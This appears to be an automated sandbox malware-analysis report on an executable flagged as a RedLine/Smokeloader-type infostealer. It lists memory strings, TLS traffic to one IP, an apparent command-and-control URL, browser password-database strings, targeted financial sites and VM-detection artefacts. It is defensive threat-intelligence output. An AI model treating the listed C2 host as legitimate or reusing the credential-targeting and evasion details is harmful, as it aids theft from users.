            Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
            Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/
            Source: VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/P
            Source: VoGtelkHSn.exe, 00000000.00000003.2047317168.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298422760.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/api
            Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apiC
            Source: VoGtelkHSn.exe, 00000000.00000003.2047317168.0000000002C7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apiV
            Source: VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/apis
            Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
            Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
            Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: VoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_0042C500 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042C500
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_0042C500 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042C500

            System Summary

            barindex
            Source: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004320100_2_00432010
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004204B70_2_004204B7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004047400_2_00404740
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_00420CA00_2_00420CA0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004060300_2_00406030
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_0041D1C10_2_0041D1C1
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004032600_2_00403260
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004052F00_2_004052F0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004065F00_2_004065F0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004345F00_2_004345F0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_0040F6900_2_0040F690
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004397D00_2_004397D0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_0042594F0_2_0042594F
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_004259D20_2_004259D2
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_00431A700_2_00431A70
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_00439AF00_2_00439AF0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_00407CB00_2_00407CB0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_00402E700_2_00402E70
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB62970_2_02EB6297
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB12670_2_02EB1267
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB30D70_2_02EB30D7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB34C70_2_02EB34C7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB55570_2_02EB5557
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EE9A370_2_02EE9A37
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02ED5BB60_2_02ED5BB6
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EBF8F70_2_02EBF8F7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EE48570_2_02EE4857
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB68570_2_02EB6857
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EBF8240_2_02EBF824
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB49A70_2_02EB49A7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02ED0F070_2_02ED0F07
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB7F170_2_02EB7F17
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EE1CD70_2_02EE1CD7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02ED5C390_2_02ED5C39
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EE9D570_2_02EE9D57
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: String function: 02EB8967 appears 48 times
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: String function: 00408D30 appears 168 times
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: String function: 02EB8F97 appears 168 times
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: String function: 00408700 appears 47 times
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 1612
            Source: VoGtelkHSn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02BF817E CreateToolhelp32Snapshot,Module32First,0_2_02BF817E
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_00429597 CoCreateInstance,0_2_00429597
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5444
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\a9d65a1f-c62f-4ac5-ace5-5785ce30c6ebJump to behavior
            Source: VoGtelkHSn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: VoGtelkHSn.exe, 00000000.00000003.2058000919.00000000054DF000.00000004.00000800.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2048169939.0000000005447000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: VoGtelkHSn.exeReversingLabs: Detection: 42%
            Source: VoGtelkHSn.exeVirustotal: Detection: 41%
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile read: C:\Users\user\Desktop\VoGtelkHSn.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\VoGtelkHSn.exe "C:\Users\user\Desktop\VoGtelkHSn.exe"
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 1612
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeUnpacked PE file: 0.2.VoGtelkHSn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeUnpacked PE file: 0.2.VoGtelkHSn.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_0043FBE7 push ecx; iretd 0_2_0043FBE8
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exe TID: 2796Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exe TID: 2796Thread sleep time: -30000s >= -30000sJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: VMware
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: VoGtelkHSn.exe, 00000000.00000003.2058143857.00000000054E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
            Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Amcache.hve.4.drBinary or memory string: vmci.sys
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
